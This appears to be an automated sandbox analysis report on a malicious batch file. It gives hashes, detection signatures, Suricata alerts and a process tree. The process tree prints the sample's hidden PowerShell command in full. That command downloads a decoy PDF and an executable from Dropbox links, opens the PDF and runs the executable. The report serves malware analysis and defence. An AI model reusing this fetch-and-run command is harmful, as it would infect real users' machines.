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Analysis Report
General Information
Sample name: | FLKCAS1DzH.batrenamed because original name is a hash value |
Original sample name: | 17ece0b40e0d30e590955d79b4de9541.bat |
Analysis ID: | 1581600 |
MD5: | 17ece0b40e0d30e590955d79b4de9541 |
SHA1: | 673913590c7bd10e084ec3e3ac49e2176cfba2bc |
SHA256: | 2d3151f761001ee38041d5b55ef6e3cc19e76b688bc42a9648d6f64a326dc063 |
Tags: | batuser-abuse_ch |
Infos: | |
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Creates HTML files with .exe extension (expired dropper behavior)
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
- System is w10x64
- cmd.exe (PID: 7260 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\FLKCA S1DzH.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7268 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7316 cmdline:
powershell -WindowSt yle Hidden -Command "$Random PDF = \"$e nv:temp\$( Get-Random ).pdf\"; $ RandomEXE = \"$env:t emp\$(Get- Random).ex e\"; IWR - Uri 'https ://www.dro pbox.com/s cl/fi/dgiu r64vawmdx9 alqw6et/Le wis-Silkin -LLP.pdf?r lkey=kduhq rnp00rj44r jeppuw31qk &dl=1' -Ou tFile $Ran domPDF ; Start-Proc ess msedge .exe -Argu mentList \ "--kiosk $ RandomPDF\ " ; IWR -U ri 'https: //www.drop box.com/sc l/fi/qzqf3 fr40w71dq8 uwcnec/run ner.exe?rl key=dfl8hx amjpp5zdy8 yzn5ejrol& dl=1' -Out File $Rand omEXE ; st art $Rando mEXE" MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 7540 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk C:\Users\ user\AppDa ta\Local\T emp\996293 227.pdf MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 7828 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=22 64 --field -trial-han dle=2032,i ,377931650 6430683619 ,185330479 8482195837 ,262144 /p refetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
- svchost.exe (PID: 7692 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 7840 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk --flag-sw itches-beg in --flag- switches-e nd --disab le-nacl -- do-not-de- elevate "C :\Users\us er\AppData \Local\Tem p\99629322 7.pdf" MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8160 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 20 --field -trial-han dle=2096,i ,893370929 6785458366 ,521354130 551247293, 262144 /pr efetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8548 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= ppapi --la ng=en-GB - -device-sc ale-factor =1 --ppapi -antialias ed-text-en abled=1 -- ppapi-subp ixel-rende ring-setti ng=1 --moj o-platform -channel-h andle=6536 --field-t rial-handl e=2096,i,8 9337092967 85458366,5 2135413055 1247293,26 2144 /pref etch:6 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8620 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 6772 --fie ld-trial-h andle=2096 ,i,8933709 2967854583 66,5213541 3055124729 3,262144 / prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8652 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=6852 --field-t rial-handl e=2096,i,8 9337092967 85458366,5 2135413055 1247293,26 2144 /pref etch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - identity_helper.exe (PID: 9116 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.47\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=7 740 --fiel d-trial-ha ndle=2096, i,89337092 9678545836 6,52135413 0551247293 ,262144 /p refetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416) - identity_helper.exe (PID: 9136 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.47\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=7 740 --fiel d-trial-ha ndle=2096, i,89337092 9678545836 6,52135413 0551247293 ,262144 /p refetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416) - msedge.exe (PID: 7376 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_search_i ndexer.moj om.SearchI ndexerInte rfaceBroke r --lang=e n-GB --ser vice-sandb ox-type=se arch_index er --messa ge-loop-ty pe-ui --mo jo-platfor m-channel- handle=692 8 --field- trial-hand le=2096,i, 8933709296 785458366, 5213541305 51247293,2 62144 /pre fetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
- msedge.exe (PID: 7556 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --no-st artup-wind ow --win-s ession-sta rt /prefet ch:5 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 7584 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=22 64 --field -trial-han dle=2036,i ,155899616 1015079312 2,17070450 8296702397 12,262144 /prefetch: 3 MD5: 69222B8101B0601CC6663F8381E7E00F)
- msedge.exe (PID: 7188 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --no-st artup-wind ow --win-s ession-sta rt /prefet ch:5 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 3756 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 88 --field -trial-han dle=2064,i ,107324262 1129795807 1,16910545 8838786420 92,262144 /prefetch: 3 MD5: 69222B8101B0601CC6663F8381E7E00F)
- cleanup
⊘No configs have been found
⊘No yara matches
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
2024-12-28T09:45:39.833516+0100 | 2803274 | 2 | Potentially Bad Traffic | | 49731 | | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
2024-12-28T09:45:33.954309+0100 | 1810000 | 1 | Potentially Bad Traffic | | 49730 | | 443 | TCP |
2024-12-28T09:45:39.833516+0100 | 1810000 | 1 | Potentially Bad Traffic | | 49731 | | 443 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | File created: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |